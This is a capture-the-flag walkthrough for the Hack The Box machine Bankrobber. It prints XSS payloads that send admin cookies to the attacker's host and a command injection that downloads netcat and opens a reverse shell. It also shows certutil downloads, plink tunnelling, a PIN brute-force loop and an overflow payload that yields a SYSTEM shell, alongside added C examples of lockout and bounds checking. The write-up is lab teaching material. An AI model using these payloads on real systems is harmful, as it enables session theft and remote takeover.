htb-bankrobber-nl

As always, we start with an nmap scan.

root@kali:~/htb/bankrobber# nmap -A 10.10.14.5 -oN AllPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 06:24 EST
Nmap scan report for 10.10.14.5
Host is up (0.000051s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   2048 85:9c:65:7b:ec:db:65:ee:28:91:c7:2e:2f:e0:22:06 (RSA)
|   256 72:bb:d3:17:56:d4:0d:fe:cb:3e:64:c9:5c:7a:41:a6 (ECDSA)
|_  256 66:62:0f:03:e5:d8:7f:e1:e8:dd:f2:ab:17:4c:a1:fc (ED25519)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 3.7.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.7.4
|_http-title: Directory listing for /
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds

Now we first create a new user and then log in as that user.

Then we capture the admin cookie:

<script>new Image().src="http://10.10.14.5:8000/bogus.php?output="+document.cookie;</script>

or

<img src=x onerror=this.src='http://10.10.14.5:8000/?c='+document.cookie>

root@kali:~/htb/# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.154 - - [29/Jan/2020 03:24:29] code 404, message File not found
10.10.10.154 - - [29/Jan/2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -

Then we send an XSS payload carrying a PowerShell iwr download command:

<script type="text/javascript">var Http = new XMLHttpRequest(); var url = '/admin/backdoorchecker.php'; var params = 'cmd=dir|powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile %temp%\a.exe";%temp%\a.exe -e cmd.exe 10.10.14.5 1111'; Http.open("POST", url, true); Http.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); Http.send(params);</script>

Optionally, we can check whether the admin auto-approved (not strictly necessary, only as a check).

First set the captured admin cookie.

Catch the user shell:

root@kali:~/htb/bankrobber# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\admin>whoami
whoami
bankrobber\cortin

C:\xampp\htdocs\admin>cd c:\users\Cortin\Desktop
C:\Users\Cortin\Desktop>type user.txt
type user.txt
f635346600876a43441cf1c6e94769ac


c:\>mkdir temp
c:\temp>certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c:\Temp\plink.exe
.\plink.exe -R 3306:127.0.0.1:3306 10.10.14.10
root@kali:~/htb/bankrobber# mysql -u root -h 127.0.0.1 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1019
Server version: 10.1.38-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| bankrobber         |
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.091 sec)

MariaDB [(none)]> select LOAD_FILE('/Users/Administrator/Desktop/root.txt');
MariaDB [(none)]> select LOAD_FILE('/Users/Cortin/Desktop/user.txt');


Later, after brute-forcing the PIN (through the plink reverse tunnel: c:\temp\plink.exe -R 4466:127.0.0.1:910 10.10.14.5) with a script, for example:

root@kali:~/htb/bankrobber# cat bandit.sh 
for x in {0..9}{0..9}{0..9}{0..9}; do
    echo $x | nc 192.168.1.139 910 | egrep -v "correct";
    echo "Try $x";
done

The PIN turned out to be: 0021
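A 4-digit PIN gives only 10,000 possibilities, which is why the loop above finishes quickly; the control the service lacks is a lockout after repeated failures. The following added example (not code from the box or from the author) models such a PIN gate in C and replays the same 0000..9999 sweep against it, once without lockout and once with a lockout after five consecutive wrong PINs. The threshold of five, the constant-time comparison and all names are design choices made for this illustration, not something the page describes.

```c
#include <stdio.h>
#include <string.h>

#define PIN_LEN 4

enum pin_result { PIN_OK = 0, PIN_WRONG = 1, PIN_LOCKED = 2 };

/* Model of a PIN gate. max_failures == 0 means "no lockout", which is how
 * the service on the box behaves; any other value locks the gate after that
 * many consecutive wrong PINs. (Illustrative structure, not the real service.) */
struct pin_gate {
    char secret[PIN_LEN + 1];
    unsigned max_failures;
    unsigned failures;
    int locked;
};

static void pin_gate_init(struct pin_gate *g, const char *secret, unsigned max_failures) {
    memset(g, 0, sizeof(*g));
    snprintf(g->secret, sizeof(g->secret), "%s", secret);
    g->max_failures = max_failures;
}

/* Constant-time comparison: every byte is always touched, so response time
 * does not reveal how many leading digits of a guess were right. */
static int ct_equal(const char *a, const char *b, size_t n) {
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

static enum pin_result pin_gate_try(struct pin_gate *g, const char *attempt) {
    if (g->locked)
        return PIN_LOCKED;
    if (strlen(attempt) == PIN_LEN && ct_equal(attempt, g->secret, PIN_LEN)) {
        g->failures = 0;
        return PIN_OK;
    }
    g->failures++;
    if (g->max_failures != 0 && g->failures >= g->max_failures)
        g->locked = 1;
    return PIN_WRONG;
}

/* Replays the brute-force loop from the page (0000..9999 in order) against
 * the gate. Returns how many guesses the gate actually evaluated; *found is
 * set to 1 if the correct PIN was accepted before the gate locked. */
static unsigned sweep_all_pins(struct pin_gate *g, int *found) {
    char guess[PIN_LEN + 1];
    unsigned evaluated = 0;
    *found = 0;
    for (int x = 0; x < 10000; x++) {
        snprintf(guess, sizeof(guess), "%04d", x);
        enum pin_result r = pin_gate_try(g, guess);
        if (r == PIN_LOCKED)
            break;                  /* the gate stopped answering; sweep is over */
        evaluated++;
        if (r == PIN_OK) {
            *found = 1;
            break;
        }
    }
    return evaluated;
}

int main(void) {
    struct pin_gate g;
    int found;
    unsigned n;

    pin_gate_init(&g, "0021", 0);       /* no lockout, as on the box */
    n = sweep_all_pins(&g, &found);
    printf("no lockout      : found=%d after %u guesses\n", found, n);

    pin_gate_init(&g, "0021", 5);       /* lock after 5 consecutive failures */
    n = sweep_all_pins(&g, &found);
    printf("5-strike lockout: found=%d after %u guesses\n", found, n);
    return 0;
}
```

Without lockout the sweep reaches 0021 on the 22nd guess; with the five-strike lockout the gate stops answering after five guesses and the correct PIN is never accepted, even when it is tried afterwards.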

C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c:\temp\nc64.exe

C:\temp>certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c:\temp\plink.exe
.\plink.exe -R 4466:127.0.0.1:910 10.10.14.5

root@kali:~/htb/bankrobber# netstat -ano | grep 4455
tcp        0      0 127.0.0.1:4455          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:4455                :::*                    LISTEN      off (0.00/0/0)

root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN is correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 1
[$] Transfering $1 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\Users\admin\Documents\transfer.exe
[$] Transaction in progress, you can safely disconnect...

c:\bankv2.exe is vulnerable to an "Integer Overflow".

After asking on the forum, it turned out the offset was about 32 'A' characters.

I used digits instead of A's, so:
12345678901234567890123456789012

Whatever follows these 32 characters is what gets executed.

My payload was:
12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236

root@kali:~/htb/bankrobber# nc 127.0.0.1 4455
--------------------------------------------------------------
Internet E-Coin Transfer System
International Bank of Sun church
v0.1 by Gio & Cneeliz
--------------------------------------------------------------
Please enter your super secret 4 digit PIN code to login:
[$] 0021
[$] PIN correct, access granted!
--------------------------------------------------------------
Please enter the amount of e-coins you would like to transfer:
[$] 12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236
[$] Transfer $12345678901234567890123456789012C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application.
[$] Executing e-coin transfer tool: C:\temp\nc64.exe -e cmd.exe 10.10.14.5 1236

[$] Transaction in progress, you can safely disconnect...
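The "Executing e-coin transfer tool" line above shows what the 32 filler characters did: the input ran past the amount field into the adjacent storage holding the path of the tool the service executes, so the default transfer.exe path was replaced by attacker-controlled text. The following is an added illustration of that root cause, not bankv2.exe's actual code (which is not on the page): the struct layout, the field sizes and the C:\constructed\payload.exe path are assumptions chosen to mirror the transcript. It shows the unchecked copy beside a bounds-checked version that rejects the same input.

```c
#include <stdio.h>
#include <string.h>

/* Layout assumed for illustration: a fixed 32-byte amount field immediately
 * followed in memory by the path of the tool the service later executes. */
#define AMOUNT_LEN    32
#define TOOL_PATH_LEN 128

struct transfer_session {
    char amount[AMOUNT_LEN];        /* user input is meant to land here */
    char tool_path[TOOL_PATH_LEN];  /* consumed by the "execute tool" step */
};

static void session_init(struct transfer_session *s) {
    memset(s, 0, sizeof(*s));
    /* Default tool, as printed by the service before the overflow. */
    strcpy(s->tool_path, "C:\\Users\\admin\\Documents\\transfer.exe");
}

/* Vulnerable pattern: the input is copied with no regard for the size of
 * amount[]. It is written as a byte copy into the whole session object so
 * this demo stays within the object's storage; a real strcpy()/gets() into
 * amount[] runs past its end into tool_path[] in exactly the same way. */
static void read_amount_vulnerable(struct transfer_session *s, const char *input) {
    char *dst = (char *)s;
    size_t n = strlen(input);
    if (n > sizeof(*s) - 1)
        n = sizeof(*s) - 1;         /* only to keep the demonstration itself well-defined */
    memcpy(dst, input, n);
    dst[n] = '\0';
}

/* Hardened form: bound the scan to the field, require the terminator to fall
 * inside it, and accept digits only. Returns 0 on success, -1 on rejection,
 * and leaves the session untouched when rejecting. */
static int read_amount_hardened(struct transfer_session *s, const char *input) {
    size_t n = 0;
    while (n < AMOUNT_LEN && input[n] != '\0')
        n++;
    if (n == 0 || n == AMOUNT_LEN)
        return -1;                  /* empty, or no room left for the NUL */
    for (size_t i = 0; i < n; i++)
        if (input[i] < '0' || input[i] > '9')
            return -1;
    memcpy(s->amount, input, n + 1);
    return 0;
}

/* Constructed input, not the page's payload: 32 filler digits, then a path. */
static const char CONSTRUCTED_PAYLOAD[] =
    "12345678901234567890123456789012" "C:\\constructed\\payload.exe";

int main(void) {
    struct transfer_session s;

    session_init(&s);
    read_amount_vulnerable(&s, CONSTRUCTED_PAYLOAD);
    printf("vulnerable: tool_path is now \"%s\"\n", s.tool_path);

    session_init(&s);
    int rc = read_amount_hardened(&s, CONSTRUCTED_PAYLOAD);
    printf("hardened  : rc=%d, tool_path still \"%s\"\n", rc, s.tool_path);
    return 0;
}
```

The vulnerable copy leaves tool_path pointing at the constructed path, exactly as the transcript shows for the real binary; the hardened reader refuses the input before anything is written, and the default path survives. Whether the real service's defect is best described as an integer or a buffer overflow, the fix is the same: never copy more into a fixed field than it can hold.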
root@kali:/opt/evil-winrm# rlwrap nc -nlvp 1236
listening on [any] 1236 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\admin\desktop
cd c:\users\admin\desktop

c:\Users\admin\Desktop>type root.txt
type root.txt
aa65d8e6216585ea636eb07d4a59b197
c:\Users\admin\Desktop>

Author: Puckiestyle
